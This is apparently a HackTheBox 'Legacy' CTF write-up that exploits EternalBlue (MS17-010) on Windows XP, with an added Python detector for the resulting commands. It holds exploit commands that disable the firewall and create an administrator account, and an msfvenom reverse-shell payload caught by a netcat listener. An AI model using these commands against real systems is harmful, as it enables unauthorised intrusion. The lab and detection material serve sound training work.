Summary
Legacy is one of the easiest boxes on HackTheBox. It runs Windows XP and is vulnerable to EternalBlue (MS17-010); a public exploit gives you a SYSTEM shell.
Discovery
I started off by running NmapAutomator.
Nmap discovered the following open ports and services:
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
The nmap vulnerability script smb-vuln-ms17-010, run by the automated scan, flagged the host as vulnerable to EternalBlue:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
Exploitation
Method 1: RDP instead of reverse shell
There are several public exploits for this, but you need to make sure the one you pick targets Windows XP. This script (send_and_execute.py, run below) does. Let's look a bit deeper at what it does:
smb_send_file(smbConn, lfile, 'C', '/%s' % filename)
service_exec(conn, r'cmd /c c:\%s' % filename)
It uploads the executable you supply to C:\ over SMB and then runs it through a service. If, for some reason, a reverse shell isn't working, you can modify the script to run commands directly instead, for example:
service_exec(conn, r'cmd /c netsh advfirewall set allprofiles state off')
service_exec(conn, r'cmd /c net user banaan pass /add')
service_exec(conn, r'cmd /c net localgroup administrators banaan /add')
This adds a new user and puts it in the local administrators group. After this you can connect over RDP:
xfreerdp /u:banaan +clipboard /v:10.11.1.75:3389
This will give you an RDP session as System.
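From the defender's side the three commands above are exactly the command-line telemetry worth alerting on: the firewall switched off, a local account created and added to Administrators within seconds, all spawned from services.exe because the exploit runs them through a service. The Python below is an added example written for this page, not code from the writeup or the exploit script. The events are constructed (their fields loosely follow Sysmon process-creation records), the five-minute look-back window is an assumption, and the group-name match covers only the English "administrators".

```python
import ntpath
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed process-creation events. The first three replay the writeup's
# command sequence as it would appear on the victim; the last two are benign
# look-alikes (listing users / listing a group) that must not fire.
EVENTS: List[Dict[str, str]] = [
    {"ts": "2024-01-01T10:00:00", "host": "XP-LEGACY", "user": "NT AUTHORITY\\SYSTEM",
     "parent": "C:\\WINDOWS\\system32\\services.exe",
     "cmd": "cmd /c netsh advfirewall set allprofiles state off"},
    {"ts": "2024-01-01T10:00:02", "host": "XP-LEGACY", "user": "NT AUTHORITY\\SYSTEM",
     "parent": "C:\\WINDOWS\\system32\\services.exe",
     "cmd": "cmd /c net user banaan pass /add"},
    {"ts": "2024-01-01T10:00:03", "host": "XP-LEGACY", "user": "NT AUTHORITY\\SYSTEM",
     "parent": "C:\\WINDOWS\\system32\\services.exe",
     "cmd": "cmd /c net localgroup administrators banaan /add"},
    {"ts": "2024-01-01T10:05:00", "host": "WKS-01", "user": "CORP\\alice",
     "parent": "C:\\WINDOWS\\explorer.exe", "cmd": "net user"},
    {"ts": "2024-01-01T11:00:00", "host": "WKS-02", "user": "CORP\\helpdesk",
     "parent": "C:\\WINDOWS\\explorer.exe", "cmd": "net localgroup administrators"},
]

# Command-line patterns for the three actions shown in the writeup. net1.exe is
# matched as well because it accepts the same syntax as net.exe.
RULES = [
    ("firewall_disabled",
     re.compile(r"\bnetsh\s+advfirewall\s+set\s+\S+\s+state\s+off\b", re.I)),
    ("local_user_added",
     re.compile(r"\bnet1?\s+user\s+(\S+)(?:\s+\S+)?\s+/add\b", re.I)),
    # English group name only; localized builds need their own alias list.
    ("added_to_administrators",
     re.compile(r"\bnet1?\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)),
]
BASE_SEVERITY = {"firewall_disabled": "medium", "local_user_added": "medium",
                 "added_to_administrators": "high"}

def classify(event: Dict[str, str]) -> List[Dict[str, str]]:
    """Return one hit per rule whose pattern appears in the event's command line."""
    hits = []
    for rule, pattern in RULES:
        m = pattern.search(event["cmd"])
        if m:
            hits.append({**event, "rule": rule, "account": m.group(1) if m.groups() else None})
    return hits

def launched_by_service_control(parent: str) -> bool:
    """Service-based remote execution, as the writeup's script uses, spawns
    the command from services.exe; explorer.exe as parent looks interactive."""
    return ntpath.basename(parent).lower() == "services.exe"

def detect(events: List[Dict[str, str]], window: timedelta = timedelta(minutes=5)) -> List[Dict]:
    """Emit one alert per rule hit, escalated when the same host shows the
    account-creation chain inside the look-back window."""
    ordered = sorted(events, key=lambda e: e["ts"])
    hits = [h for e in ordered for h in classify(e)]
    alerts = []
    for hit in hits:
        t = datetime.fromisoformat(hit["ts"])
        # Rules that fired on the same host at or before this event, within the window.
        seen = {x["rule"] for x in hits
                if x["host"] == hit["host"]
                and timedelta(0) <= t - datetime.fromisoformat(x["ts"]) <= window}
        severity = BASE_SEVERITY[hit["rule"]]
        if hit["rule"] == "added_to_administrators" and "local_user_added" in seen:
            severity = "critical" if "firewall_disabled" in seen else "high"
        alerts.append({
            "ts": hit["ts"], "host": hit["host"], "rule": hit["rule"],
            "account": hit["account"], "severity": severity,
            "correlated": sorted(seen - {hit["rule"]}),
            "via_service_control": launched_by_service_control(hit["parent"]),
        })
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Run against real telemetry, the `via_service_control` flag is the cheap tell that separates this from an admin doing the same thing at a console, and the `correlated` list is what lets the account-creation alert carry the firewall event with it instead of arriving as three unrelated medium-severity tickets.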
Method 2: Reverse Shell
Before running the script you need to supply an executable. This one was generated with msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
The script can then be run as follows:
python2.7 send_and_execute.py 10.129.5.63 rev.exe
Make sure you have a netcat listener ready on port 4444, and you will receive a SYSTEM shell.
Conclusion
This was probably one of the easiest boxes on HackTheBox and very straightforward. I hope you enjoyed this writeup!